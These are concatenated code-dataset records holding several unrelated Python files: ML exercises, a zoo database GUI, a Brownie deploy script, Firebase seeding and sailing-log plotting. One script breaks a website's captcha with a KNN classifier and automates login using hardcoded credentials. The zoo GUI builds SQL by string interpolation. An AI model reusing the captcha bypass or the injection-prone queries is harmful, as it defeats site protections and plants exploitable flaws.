print(\"Invalid input. 
Please enter a number.\")\n\n# End of the program\n","repo_name":"Angiemerkaj/TeamAssignment","sub_path":"teamassignment.py","file_name":"teamassignment.py","file_ext":"py","file_size_in_byte":1394,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"820338001","text":"import base64\nimport os\nimport time\nfrom io import BytesIO\n\nimport requests\nfrom PIL import Image, ImageDraw\nimport numpy as np\nfrom sklearn import neighbors, preprocessing\nfrom sklearn.model_selection import train_test_split, cross_val_score\n\nfrom scikit.图片识别测试 import createData1\nfrom scikit.生成图片 import iamge2imbw\nfrom sklearn import preprocessing\nimport matplotlib.pyplot as plt\n\n\n# 获取图片\ndef getimg(url='http://www.nb.top/12lian/user/getimg'):\n headers = {\n 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36'}\n r = requests.post(url, headers=headers)\n\n return r.json();\n\n\ndef train():\n X, y = createData1()\n scaler = preprocessing.StandardScaler().fit(X)\n scaler.transform(X)\n knn = neighbors.KNeighborsClassifier()\n\n knn.fit(X, y)\n return knn, scaler\n\n\ndef score(n_neighbors=3):\n X, y = createData1()\n preprocessing.scale(X)\n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3)\n knn = neighbors.KNeighborsClassifier(n_neighbors=n_neighbors)\n knn.fit(X_train, y_train)\n print(knn.score(X_test, y_test))\n\n\ndef login(url, codid, vercode):\n headers = {\n 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36'}\n email = '982973525@qq.com'\n pwd = 'aa64c947ce278ddc0b4418bd186fb1a0'\n data = {'email': email,\n 'pwd': pwd,\n 'codeid': codid,\n 'vercode': vercode,\n 'source': 1\n }\n\n r = requests.post(url, data=data, headers=headers)\n return r.json()\n\n\n# 将图片分成五份\ndef spitAndSave(knn=None, scaler=None):\n json = getimg()\n IMGCode = json['attachment']['IMGCode']\n codeUUID = json['attachment']['codeUUID']\n imgdata = base64.b64decode(IMGCode)\n image_data = BytesIO(imgdata)\n im = Image.open(image_data)\n # im.save('../data/verify_code/' + codeUUID + \".jpg\")\n\n py = [];\n for j in range(5):\n box = (20 * j, 00, (1 + j) * 20, 30)\n dm = im.crop(box)\n dm = dm.convert(\"L\")\n dm, rate = iamge2imbw(dm)\n dm.save('../data/chaoex/ ' + str(j) + '_' + codeUUID + \".jpg\");\n\n if knn != None:\n data = [dm.getdata()];\n scaler.transform(data)\n p = knn.predict(data);\n print(p[0])\n dm.save('../data/prdict/' + p[0] + '_' + codeUUID + \".jpg\");\n\n\n# 将图片分成五份\ndef spit2():\n json = getimg()\n IMGCode = json['attachment']['IMGCode']\n codeUUID = json['attachment']['codeUUID']\n imgdata = base64.b64decode(IMGCode)\n image_data = BytesIO(imgdata)\n im = Image.open(image_data)\n\n dms = [];\n data = []\n for j in range(5):\n box = (20 * j, 00, (1 + j) * 20, 30)\n dm = im.crop(box)\n dm = dm.convert(\"L\")\n dm, rate = iamge2imbw(dm)\n dms.append(dm)\n data.append(dm.getdata())\n return data, dms, codeUUID;\n\n\ndef create():\n for i in range(10):\n r = getimg();\n t = str(int(time.time() * 1000))\n\n IMGCode = r['attachment']['IMGCode']\n codeUUID = r['attachment']['codeUUID']\n imgdata = base64.b64decode(IMGCode)\n # filename = os.popen('redis-cli -h 192.168.0.138 get IMG' + codeUUID).read().strip() + '_' + t + '.jpg'\n filename = codeUUID + '.jpg';\n print(filename)\n file = open('../data/verify_code/' + filename, 'wb')\n file.write(imgdata)\n 
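# getimg()/spit2() above round-trip base64 JSON payloads into PIL images.
# The decode step in isolation, using a tiny image generated on the spot
# rather than a real captcha:
import base64
from io import BytesIO
from PIL import Image

buf = BytesIO()
Image.new("L", (20, 30), 255).save(buf, format="PNG")
b64 = base64.b64encode(buf.getvalue()).decode()

im = Image.open(BytesIO(base64.b64decode(b64)))
print(im.size)  # (20, 30), the per-character crop size used above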
file.close()\n\n\ndef train_real():\n knn, scaler = train();\n test_x, dms, codeUUID = spit2()\n scaler.transform(test_x)\n vercode = ''.join(knn.predict(test_x))\n print(vercode)\n\n r = login('http://www.nb.top/12lian/user/login', codeUUID, vercode)\n print(r)\n if r['status'] != 200:\n for i in range(5):\n dms[i].save('../data/prdict/' + vercode[i] + '_' + codeUUID + str(i) + \".jpg\");\n else:\n for i in range(5):\n dms[i].save('../data/single_code/' + vercode[i] + '_' + codeUUID + str(i) + \".jpg\");\n\n\ndef pp():\n k_scores = []\n\n x, y = createData1()\n for k in range(1, 30):\n knn = neighbors.KNeighborsClassifier(n_neighbors=k)\n scores = cross_val_score(knn, x, y, cv=10, scoring='accuracy') # for classification\n k_scores.append(scores.mean())\n plt.plot(range(1, 30), k_scores)\n plt.xlabel('Value of K for KNN')\n plt.ylabel('Cross-Validated Accuracy')\n plt.show()\n\n\nif __name__ == '__main__':\n score()\n","repo_name":"bigcong/tinker","sub_path":"scikit/CHAOEX测试.py","file_name":"CHAOEX测试.py","file_ext":"py","file_size_in_byte":4550,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73932414186","text":"from tkinter import *\nfrom tkinter.ttk import Notebook\nimport mysql.connector\n\nimport species, animals, enclosures, complexes\n\n# Create a connection to the database\nmydb = mysql.connector.connect(\n host = \"localhost\",\n user = \"root\",\n password = \"password\",\n database = \"zoodatabase\"\n)\n\nmycursor = mydb.cursor()\n\ndef signout_clicked():\n zookeeperPage.destroy()\n mainFrame.place(relwidth=1,relheight=1)\n\ndef handle_zookeeper_page(window,eid,mFrame):\n global mainFrame\n mainFrame = mFrame\n\n global zookeeperPage\n zookeeperPage = Frame(window)\n\n zookeeperPage.rowconfigure(0,weight=1)\n zookeeperPage.rowconfigure(1,weight=1)\n zookeeperPage.columnconfigure(0,weight=1)\n\n zookeeperPage.place(relwidth=1,relheight=1)\n\n signoutButton = Button(zookeeperPage, text=\"Sign Out\", command=signout_clicked)\n signoutButton.grid(row=0,column=0,columnspan=2,sticky=N+W,padx=5)\n\n zookeeperNotebook = Notebook(zookeeperPage)\n zookeeperNotebook.grid(row=1,column=0)\n\n #Create frames\n homeFrame = Frame(zookeeperNotebook, width=1000, height=700)\n speciesFrame = Frame(zookeeperNotebook, width=1000, height=700)\n animalsFrame = Frame(zookeeperNotebook, width=1000, height=700)\n enclosuresFrame = Frame(zookeeperNotebook, width=1000, height=700)\n complexesFrame = Frame(zookeeperNotebook, width=1000, height=700)\n\n homeFrame.pack(fill='both', expand=True)\n speciesFrame.pack(fill='both', expand=True)\n animalsFrame.pack(fill='both', expand=True)\n enclosuresFrame.pack(fill='both', expand=True)\n complexesFrame.pack(fill='both', expand=True)\n\n zookeeperNotebook.add(homeFrame, text='Home')\n zookeeperNotebook.add(speciesFrame, text='Species')\n zookeeperNotebook.add(animalsFrame, text='Animals')\n zookeeperNotebook.add(enclosuresFrame, text='Enclosures')\n zookeeperNotebook.add(complexesFrame, text='Indoor Complexes')\n \n set_home_frame(homeFrame,eid)\n species.setSpeciesFrame(speciesFrame, True)\n animals.set_animals_frame(animalsFrame)\n enclosures.set_enclosures_frame(enclosuresFrame, False)\n complexes.set_complexes_frame(complexesFrame, False)\n\ndef set_home_frame(hFrame,eid):\n global homePage\n homePage = hFrame\n\n homePage.rowconfigure(0,weight=1)\n homePage.rowconfigure(1,weight=1)\n homePage.rowconfigure(2,weight=1)\n homePage.rowconfigure(3,weight=1)\n homePage.rowconfigure(4,weight=1)\n\n 
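`set_home_frame()` here runs five near-identical queries and interpolates `eid` into each with `%`, which breaks on quoting and is injection-prone if the id ever comes from user input. A sketch of one parameterized SELECT instead, reusing the local credentials the record configures at module level; the employee id is a hypothetical value:

import mysql.connector

# Assumption: same local credentials as the record above.
conn = mysql.connector.connect(
    host="localhost", user="root", password="password", database="zoodatabase"
)
cur = conn.cursor()

eid = 1  # hypothetical employee id
# One parameterized SELECT replaces the five '... = %s' % eid interpolations;
# the connector quotes the tuple values itself.
cur.execute(
    "SELECT Name, Email, Phone_number, Address, Start_date "
    "FROM Employee WHERE EmployeeID = %s",
    (eid,),
)
name, email, phone, address, start_date = cur.fetchone()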
mycursor.execute(\"SELECT Name FROM Employee WHERE EmployeeID = %s\"%eid)\n result = mycursor.fetchall()\n nameMessage = Label(homePage,text=\"Welcome %s\"%result[0])\n nameMessage.grid(row=0,column=0,sticky=N+S+W+E,padx=5,pady=10)\n\n mycursor.execute(\"SELECT Email FROM Employee WHERE EmployeeID = %s\"%eid)\n result = mycursor.fetchall()\n emailMessage = Label(homePage,text=\"Email: %s\"%result[0])\n emailMessage.grid(row=1,column=0,sticky=N+S+W+E,padx=5,pady=10)\n\n mycursor.execute(\"SELECT Phone_number FROM Employee WHERE EmployeeID = %s\"%eid)\n result = mycursor.fetchall()\n phoneMessage = Label(homePage,text=\"Phone: %s\"%result[0])\n phoneMessage.grid(row=2,column=0,sticky=N+S+W+E,padx=5,pady=10)\n\n mycursor.execute(\"SELECT Address FROM Employee WHERE EmployeeID = %s\"%eid)\n result = mycursor.fetchall()\n addressMessage = Label(homePage,text=\"Address: %s\"%result[0])\n addressMessage.grid(row=3,column=0,sticky=N+S+W+E,padx=5,pady=10)\n\n mycursor.execute(\"SELECT Start_date FROM Employee WHERE EmployeeID = %s\"%eid)\n result = mycursor.fetchall()\n startdateMessage = Label(homePage,text=\"You've been working here since %s\"%result[0])\n startdateMessage.grid(row=4,column=0,sticky=N+S+W+E,padx=5,pady=10)","repo_name":"MackenzieBowal/ZooDatabase_Project","sub_path":"gui/zookeeper.py","file_name":"zookeeper.py","file_ext":"py","file_size_in_byte":3665,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"1116512218","text":"import pandas as pd\nimport math\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.ensemble import RandomForestClassifier\nimport numpy as np\nimport pickle\n\ndf=pd.read_csv('C:FlightData.csv')\n\ndf = df.drop('Unnamed: 25', axis=1)\n\ndf = df[[\"MONTH\", \"DAY_OF_MONTH\", \"DAY_OF_WEEK\", \"ORIGIN\", \"DEST\", \"CRS_DEP_TIME\", \"ARR_DEL15\"]]\n\ndf = df.fillna({'ARR_DEL15': 1})\n\nfor index, row in df.iterrows():\n df.loc[index, 'CRS_DEP_TIME'] = math.floor(row['CRS_DEP_TIME'] / 100)\n\ndf = pd.get_dummies(df, columns=['ORIGIN', 'DEST'])\n\ntrain_x, test_x, train_y, test_y = train_test_split(df.drop('ARR_DEL15', axis=1), df['ARR_DEL15'], test_size=0.2, random_state=42)\n\nmodel = RandomForestClassifier(random_state=13)\nmodel.fit(train_x, train_y)\n\ndef predict_delay(departure_date_time, origin, destination):\n from datetime import datetime\n\n try:\n departure_date_time_parsed = datetime.strptime(departure_date_time, '%d/%m/%Y %H:%M:%S')\n except ValueError as e:\n return 'Error parsing date/time - {}'.format(e)\n\n month = departure_date_time_parsed.month\n day = departure_date_time_parsed.day\n day_of_week = departure_date_time_parsed.isoweekday()\n hour = departure_date_time_parsed.hour\n\n origin = origin.upper()\n destination = destination.upper()\n\n input = [{'MONTH': month,\n 'DAY': day,\n 'DAY_OF_WEEK': day_of_week,\n 'CRS_DEP_TIME': hour,\n 'ORIGIN_ATL': 1 if origin == 'ATL' else 0,\n 'ORIGIN_DTW': 1 if origin == 'DTW' else 0,\n 'ORIGIN_JFK': 1 if origin == 'JFK' else 0,\n 'ORIGIN_MSP': 1 if origin == 'MSP' else 0,\n 'ORIGIN_SEA': 1 if origin == 'SEA' else 0,\n 'DEST_ATL': 1 if destination == 'ATL' else 0,\n 'DEST_DTW': 1 if destination == 'DTW' else 0,\n 'DEST_JFK': 1 if destination == 'JFK' else 0,\n 'DEST_MSP': 1 if destination == 'MSP' else 0,\n 'DEST_SEA': 1 if destination == 'SEA' else 0 }]\n\n return model.predict_proba(pd.DataFrame(input))[0][0]\n\n#pickle.dump(regressor, open('model.pkl','wb'))\n\nwith open('model.pkl', 'wb') as f:\n pickle.dump(model, f)\n\nwith 
open('model.pkl', 'rb') as f:\n model = pickle.load(f)\n\n# Loading model to compare the results\n#model = pickle.load(open('model.pkl','rb'))\n#print(model.predict_delay([[2, 9, 6]]))\n","repo_name":"rohit523/ATC","sub_path":"Model/Flight Delay/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":2368,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"23025887190","text":"from brownie import FundMe, config,network, MockV3Aggregator\nfrom scripts.helpful_script import (get_account , deploy_mock,local_blockchain_environment,LOCAL_MAINNET_FORK_ENVIRONMENT)\n\n\n# ifI add account through terminal then it is added in brownie not acces through accouts[0], \n# account = account.load()\n\ndef fund_me():\n account = get_account()\n # if network.show_active()!=\"development\":\n # since ganache is not a development network but its a local network\n \n if network.show_active() not in local_blockchain_environment:\n price_feed = config[\"networks\"][network.show_active()][\n \"eth_usd_price_feed\"\n ]\n else:\n deploy_mock()\n price_feed = MockV3Aggregator[-1].address\n\n #price feed as a argument is needed to pass becuase every testnet has different rpicefeed address\n # this price feed aggregator contain all the information about the rate of eth vs dollar\n #interfaces allow us to itnereact eith external real time event\n fund_me = FundMe.deploy(price_feed , {\"from\": account} , publish_source = config[\"networks\"][network.show_active()].get(\"verify\"))\n return fund_me\n\n\n'''API not set for this network when try to deploy on ganache because etherscan dont know about ganache'''\ndef main():\n fund_me()","repo_name":"Amiteshgupta22/Brownie_fundme","sub_path":"scripts/deploy.py","file_name":"deploy.py","file_ext":"py","file_size_in_byte":1283,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"15863369285","text":"def printSeparator(title):\r\n\tprint('~~~~~~~~~ ' + title + ' ~~~~~~~~~~~~~~~~')\r\n\tpass\r\n\r\nprintSeparator('Any number of arguments')\r\n# Accepts variable number of arguments\r\ndef listStrings(*strings):\r\n\ti = 0\r\n\t#iterate through the tuple\r\n\tfor s in strings:\r\n\t\ti += 1\r\n\t\tprint(i, ' ', s)\r\n\r\n\r\nlistStrings('Guru', 1, 'Sarath', 'CAR', 'LOVE', 'BILLIONAIR', 'HEALTHY', 'PRIYANKA', \"FAMILY\", 'Business')\r\n\r\nprintSeparator('Map function')\r\n\r\ndef square(x):\r\n\treturn x**2\r\n\r\n# Using squares to create list of squares\r\nsquares = map(square, [1,2,3])\r\nprint(squares)\r\nfor s in squares:\r\n\tprint(s)\r\n\r\nprintSeparator('Lambda Expressions')\r\nf = lambda x : x*x*x\r\nf2 = lambda x,y: x+y\r\n\r\nprint(f(3))\r\nprint(f2(3,4))\r\n\r\nclass Numbers:\r\n\t\r\n\tNums = list()\r\n\r\n\tdef __init__(self,*tupleX):\r\n\t\tfor n in tupleX:\r\n\t\t\tself.Nums.extend([n])\r\n\r\n\tdef listNums(self):\r\n\t\tprint(self.Nums)\r\n\r\n\r\nobjNums = Numbers(1,2,3,4,5)\r\nobjNums.listNums()","repo_name":"gurusarath1/Snippets","sub_path":"Python_Learning/Python_Learning.py","file_name":"Python_Learning.py","file_ext":"py","file_size_in_byte":914,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70579746667","text":"# leetcode 96, 中等, 动态规划的思想\n# 给定一个整数 n,求以 1 ... 
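The record above (its comments are in Chinese) counts the binary search trees on nodes 1..n: fixing node j+1 as the root leaves j keys for the left subtree and n-j-1 for the right, so num(n) = sum of num(j) * num(n-j-1) for j = 0..n-1 with num(0) = 1, and the closed form is the Catalan number (2n)! / ((n+1)! * n!). A standalone cross-check of the two:

import math

def num_trees_dp(n: int) -> int:
    # dp[i] counts BSTs with i nodes; the empty tree counts as one.
    dp = [0] * (n + 1)
    dp[0] = 1
    for i in range(1, n + 1):
        for j in range(i):
            dp[i] += dp[j] * dp[i - j - 1]
    return dp[n]

def num_trees_catalan(n: int) -> int:
    return math.factorial(2 * n) // (math.factorial(n + 1) * math.factorial(n))

assert all(num_trees_dp(n) == num_trees_catalan(n) for n in range(10))
print(num_trees_dp(5))  # 42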
n 为节点组成的二叉搜索树有多少种?\n#\n# 示例:\n#\n# 输入: 3\n# 输出: 5\n# 解释:\n# 给定 n = 3, 一共有 5 种不同结构的二叉搜索树:\n#\n# 1 3 3 2 1\n# \\ / / / \\ \\\n# 3 2 1 1 3 2\n# / / \\ \\\n# 2 1 2 3\nimport math\n\n\nclass Solution:\n def numTrees_1(self, n:int)->int:\n \"\"\"\n 利用动态规划的思想从底向上解答问题。\n 假设有m种二叉树,m = 左子树的种类 * 右子树的种类\n 因此可以形成一个表达式num(n) = num(j) * num(n-j-1)\n 注意当根节点为空时,也是一种二叉树,\n :param n:\n :return:\n \"\"\"\n re = [0 for i in range(0, n+1)] # 注意这里是n+1,\n re[0] = 1 # 0时算一个树\n re[1] = 1\n for i in range(2, n+1):\n for j in range(0, i):\n re[i] = re[i] + re[j] * re[i-j-1]\n return re[n]\n\n def numTrees_2(self, n:int)->int:\n \"\"\"\n 直接利用数学公式,一个有n个节点的二叉树,一共有:\n (2n)!/((n+1)!*n!)\n :param n:\n :return:\n \"\"\"\n return math.factorial(2*n)//(math.factorial(n+1)*math.factorial(n))\n\n\nsol = Solution()\nprint(sol.numTrees_2(5))\n\n\n\n\n","repo_name":"liying123456/python_leetcode","sub_path":"tree/96_numTrees.py","file_name":"96_numTrees.py","file_ext":"py","file_size_in_byte":1431,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"39265086154","text":"# Import numpy\nimport numpy as np\n\n# Compute number of data points: n_data\nn_data = len(versicolor_petal_length)\n\n# Number of bins is the square root of number of data points: n_bins\nn_bins = np.sqrt(n_data)\n\n# Convert number of bins to integer: n_bins\nn_bins = int(n_bins)\n\n# Plot the histogram\n_ = plt.hist(versicolor_petal_length, bins=n_bins)\n\n# Label axes\n_ = plt.xlabel('petal length (cm)')\n_ = plt.ylabel('count')\n\n# Show histogram\nplt.show()\n\n##***************************************************************\n##***************************************************************\n##***************************************************************\n\ndef ecdf(data):\n \"\"\"Compute ECDF for a one-dimensional array of measurements.\"\"\"\n\n # Number of data points: n\n n = len(data)\n\n\n # x-data for the ECDF: x\n x = np.sort(data)\n\n # y-data for the ECDF: y\n y = np.arange(1, n+1) / n\n\n return x, y\n","repo_name":"michmoca/proyecto-estadisticautn","sub_path":"codigos-implementar.py","file_name":"codigos-implementar.py","file_ext":"py","file_size_in_byte":914,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74759944428","text":"import firebase_admin\r\nfrom firebase_admin import credentials\r\nfrom firebase_admin import db\r\n\r\ncred = credentials.Certificate(\"serviceAccountKey.json\")\r\nfirebase_admin.initialize_app(cred, {\r\n 'databaseURL':\"https://faceauthenticator-570df-default-rtdb.firebaseio.com/\"\r\n})\r\n\r\nref = db.reference('Students')\r\n\r\ndata = {\r\n \"101\" : {\r\n \"name\" : \"A R Kaarthikeyan\",\r\n \"major\" : \"CSE\",\r\n \"starting_year\" : 2020,\r\n \"total_attendance\" : 5,\r\n \"year\" : 3,\r\n \"standing\" : \"G\",\r\n \"last_attendance_time\": \"2023-03-28 12:30:58\"\r\n },\r\n \"102\" : {\r\n \"name\" : \"Elon Musk\",\r\n \"major\" : \"CSE\",\r\n \"starting_year\" : 2020,\r\n \"total_attendance\" : 4,\r\n \"year\" : 3,\r\n \"standing\" : \"G\",\r\n \"last_attendance_time\": \"2023-03-28 12:30:58\"\r\n },\r\n \"103\" : {\r\n \"name\" : \"Ratan Tata\",\r\n \"major\" : \"Economics\",\r\n \"starting_year\" : 2020,\r\n \"total_attendance\" : 8,\r\n \"year\" : 4,\r\n \"standing\" : \"G\",\r\n \"last_attendance_time\": \"2023-03-28 12:30:58\"\r\n },\r\n \"104\" : {\r\n \"name\" : \"Steve Jobs\",\r\n \"major\" : \"IT\",\r\n \"starting_year\" : 2020,\r\n \"total_attendance\" : 3,\r\n \"year\" : 3,\r\n 
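The record above pushes each student with a separate `ref.child(key).set(value)` round trip. Assuming the same initialized `firebase_admin` app, `Reference.update()` can write all children in one request; the two abbreviated student entries below are illustrative:

from firebase_admin import db

# Assumption: firebase_admin.initialize_app(...) has already run, as in the
# record above; the student fields are abbreviated for illustration.
students = db.reference("Students")
students.update({
    "101": {"name": "A R Kaarthikeyan", "major": "CSE", "total_attendance": 5},
    "102": {"name": "Elon Musk", "major": "CSE", "total_attendance": 4},
})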
\"standing\" : \"G\",\r\n \"last_attendance_time\": \"2023-03-28 12:30:58\"\r\n },\r\n \r\n}\r\n\r\nfor key,value in data.items():\r\n ref.child(key).set(value)","repo_name":"arkaarthikeyan23/Face-Authenticator","sub_path":"addDataToDB.py","file_name":"addDataToDB.py","file_ext":"py","file_size_in_byte":1407,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"5286281288","text":"\ndef haveZeros(x):\n tmp = x\n while tmp > 0:\n val = tmp%10\n if val == 0:\n return False\n tmp = tmp//10\n return True\n\ndef sumOfdigits(x):\n sum = 0\n tmp = x\n while tmp > 0:\n sum += tmp%10\n tmp = tmp//10\n return sum\n\ndef productOfDigits(x):\n pr = 1\n tmp = x\n while tmp > 0:\n pr *= tmp%10\n tmp = tmp//10\n return pr\n\ndef divisibleNumbers(n):\n flag = True\n for m in range(1,n+1):\n if n%m == 0:\n flag = haveZeros(m)\n flag = (sumOfdigits(m)>= productOfDigits(m))\n if flag:\n return m\n\n return -1\n\nprint(divisibleNumbers(32))","repo_name":"krzychsol/Algorithms-and-Data-Structures","sub_path":"Others/Hackerrank/DivisibleNumbers.py","file_name":"DivisibleNumbers.py","file_ext":"py","file_size_in_byte":670,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"41885910116","text":"import argparse\nimport datetime as dt\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.dates as md\n\n\ndef proces_logs(args):\n\n # Speed data\n process_sources(['speed-DST810', 'speed-H5000-BS', 'speed-H5000-CPU'],\n ['sow', 'sow-sog'],\n args.work_dir)\n\n # Wind data\n process_sources(['wind-H5000-MHU', 'wind-WS310', 'wind-H5000-CPU'],\n ['awa', 'aws', 'twa', 'tws'],\n args.work_dir)\n\n # Heading data\n process_sources(['heading-Precision-9', 'heading-ZG100'],\n ['mag', 'cog', 'mag-cog'],\n args.work_dir)\n\n\ndef process_sources(sources, values, work_dir):\n vals = read_values(sources, values, work_dir)\n plot_values(sources, values, vals)\n\n\ndef plot_values(sources, values, vals):\n for value in values:\n plt.figure()\n for source in sources:\n label = source\n val = np.array(vals[source][value])\n timestamps = np.array(vals[source][value + '-time']) / 1000.0\n dates = [dt.datetime.fromtimestamp(ts) for ts in timestamps]\n\n if np.isnan(val).all():\n continue\n\n plt.xticks(rotation=25)\n ax = plt.gca()\n xfmt = md.DateFormatter('%Y-%m-%d %H:%M:%S')\n ax.xaxis.set_major_formatter(xfmt)\n\n if '-' in value:\n mean = np.nanmean(val)\n std = np.nanstd(val)\n label += f' {mean:.2f} +/- {std:.2f}'\n plt.plot(dates, val, label=label)\n\n plt.legend()\n plt.title(value)\n plt.grid(True)\n\n\ndef read_values(sources, values, work_dir):\n vals = {}\n for source in sources:\n\n vals[source] = {}\n vals[source]['time'] = []\n for value in values:\n vals[source][value] = []\n vals[source][value + '-time'] = []\n\n csv_file_name = work_dir + '/' + source + '-instr.csv'\n with open(csv_file_name, 'r') as f:\n print(f'Reading {csv_file_name}')\n for line in f:\n t = line.split(',')\n for value in values:\n time_stamp_ms = int(t[0])\n if '-' in value:\n exp = value.split('-') # e.g. 
mag-cog compute difference between two values\n op1 = exp[0]\n op2 = exp[1]\n else:\n op1 = None\n op2 = None\n for i in range(len(t)-1):\n v = t[i + 1]\n if t[i] == value:\n val = float(v) if len(v) > 0 else np.nan\n if op1 is not None and t[i] == op1:\n val1 = float(v) if len(v) > 0 else np.nan\n if op2 is not None and t[i] == op2:\n val2 = float(v) if len(v) > 0 else np.nan\n\n if op1 is not None and op2 is not None:\n diff = val1 - val2\n if diff > 180:\n diff -= 360\n elif diff < -180:\n diff += 360\n vals[source][value].append(diff)\n else:\n vals[source][value].append(val)\n\n vals[source][value + '-time'].append(time_stamp_ms)\n\n print(f'Processed {len(vals[source][values[0]])} values')\n return vals\n\n\nif __name__ == '__main__':\n\n parser = argparse.ArgumentParser(fromfile_prefix_chars='@')\n parser.add_argument(\"--work-dir\", help=\"Working directory\", default='/private/tmp/ydn-csv')\n\n proces_logs(parser.parse_args())\n\n plt.show()\n","repo_name":"sergei/sailvue","sub_path":"scripts/plot_instr.py","file_name":"plot_instr.py","file_ext":"py","file_size_in_byte":3767,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"40172764948","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Sep 23 14:50:43 2021\n\n@author: Ouyang\n\"\"\"\n\nimport copy\nimport numpy as np\nimport pandas as pd\nimport genMatrix as gM\n\ndef simMat(m, itemCF = False, simMethod = \"cosine\"):\n mat = copy.deepcopy(m)\n \n #为了方便计算相似度,把无打分的位置记作0\n mat[mat==-1] = 0\n \n #若为itemCF,只需转置矩阵即可\n if itemCF==True:\n mat = mat.T\n \n #初始化相似度矩阵 \n nRow = np.shape(mat)[0]\n nCol = np.shape(mat)[1] \n \n #求行列打分均值(去掉未打分的格子),并找出从未打分的用户或商品\n noDataRow = [\"\"]\n noDataCol = [\"\"]\n mRow = pd.Series([0.0] * nRow, index = mat.index) #储存行均值(浮点型)\n for i in range(0, nRow):\n ite = mat.iloc[i]\n if sum(ite!=0)==0: #从未打分\n noDataRow.append(mat.index[i])\n else:\n #下面的判断是防止出现所有评分相等,减去均值等于0的情况。此时不应算均值\n if len(ite.unique())>2 or (len(ite.unique())==2 & sum(ite==0)==0):\n mRow[i] = np.mean(ite[ite!=0])\n \n mCol = pd.Series([0.0] * nCol, index = mat.columns) #储存列均值\n for j in range(0, nCol):\n ite = mat.iloc[:, j] #当前列\n if sum(ite!=0)==0: #从未被打分\n noDataCol.append(mat.columns[j])\n else:\n if len(ite.unique())>2 or (len(ite.unique())==2 & sum(ite==0)==0):\n mCol[j] = np.mean(ite[ite!=0])\n \n #删除无评分的行列 \n del noDataRow[0]\n del noDataCol[0]\n mat = mat.drop(index = noDataRow)\n mat = mat.drop(columns = noDataCol)\n mRow = mRow.drop(index = noDataRow)\n mCol = mCol.drop(index = noDataCol)\n \n #计算有评分的相似度矩阵(这是个对称矩阵,且对角元素无意义,设为0)\n nRow = np.shape(mat)[0]\n nCol = np.shape(mat)[1] \n simMat = np.zeros([nRow, nRow])\n for i in range(0, nRow):\n simMat[i, i] = 0\n \n for j in range(i + 1, nRow):\n a = np.array(mat.iloc[i])\n b = np.array(mat.iloc[j])\n \n #下面使用相关系数打分,注意没有打分(等于0)的格子不需要纠偏\n if simMethod==\"pearson_same\":\n a[a!=0] = a[a!=0] - np.array([mRow[i]] * sum(a!=0))\n b[b!=0] = b[b!=0] - np.array([mRow[j]] * sum(b!=0))\n elif simMethod==\"pearson_alter\":\n a[a!=0] = a[a!=0] - mCol[a!=0]\n b[b!=0] = b[b!=0] - mCol[b!=0]\n \n #计算向量余弦值\n simMat[i, j] = sum(a * b) / (np.linalg.norm(a) * np.linalg.norm(b)) \n simMat[j, i] = simMat[i, j]\n \n #继承mat的用户名和商品名 \n simMat = pd.DataFrame(simMat, index = mat.index, columns = mat.index)\n \n if itemCF==True:\n return simMat, noDataCol, noDataRow\n else:\n return simMat, noDataRow, noDataCol\n\n\ndef CF(m, uID, top = 5, rec = 5, itemCF = False, simMethod = \"cosine\",\n simBound = 0, positive = 0):\n [sMat, ndU, ndI] = 
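Glossing the Chinese comments in `simMat()` above: unrated cells (stored as -1) are zeroed, `itemCF=True` transposes the matrix, the two Pearson variants center each vector by row or column means taken over rated cells only, and similarity is the cosine of the resulting vectors. A compact vectorized cosine over the rows of a toy ratings matrix, equivalent to the record's pairwise loop for the plain-cosine case:

import numpy as np

ratings = np.array([[5.0, 3.0, 0.0],
                    [4.0, 0.0, 4.0],
                    [1.0, 1.0, 5.0]])   # 0 marks "no rating", as in simMat

norms = np.linalg.norm(ratings, axis=1, keepdims=True)
unit = ratings / np.where(norms == 0, 1, norms)   # guard all-zero rows
similarity = unit @ unit.T                        # cosine of every row pair
np.fill_diagonal(similarity, 0)                   # self-similarity is unused
print(similarity.round(3))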
